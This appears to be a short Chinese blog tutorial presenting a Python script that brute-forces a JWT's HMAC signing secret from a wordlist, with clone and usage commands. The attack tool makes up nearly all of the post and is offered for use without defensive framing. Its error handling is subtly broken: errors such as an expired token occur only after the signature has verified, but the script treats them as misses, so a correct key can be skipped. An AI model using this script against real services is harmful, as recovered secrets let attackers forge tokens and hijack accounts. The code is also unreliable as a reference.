前言
JWT签名秘密暴力破解
下载项目
1
2
| git clone https://github.com/Feiju12138/crack_jwt_signature_secret.git
cd crack_jwt_signature_secret
|
源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| import sys
import jwt
if __name__ == '__main__':
if len(sys.argv) != 4:
print("Usage: python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256")
quit()
dict = sys.argv[1]
arg = sys.argv[2]
algorithms = sys.argv[3]
f = open(dict)
line_list = f.readlines()
for line in line_list:
try:
jwt.decode(arg, verify=True, key=line.strip(), algorithms=algorithms)
f.close()
print(f"found success: {line}")
quit()
except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError, jwt.exceptions.InvalidSignatureError) as e:
continue
except Exception as e:
print(f"err: {e}")
break
f.close()
print(f"found failed")
|
下载依赖
crack_jwt_signature_secret.py
暴力破解
dict.txt:指定字典
xxx.xxx.xxx:JWT
HS256:加密方式
1
| python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256
|
完成
参考文献
哔哩哔哩——逆风微笑的代码狗
CSDN——1024小神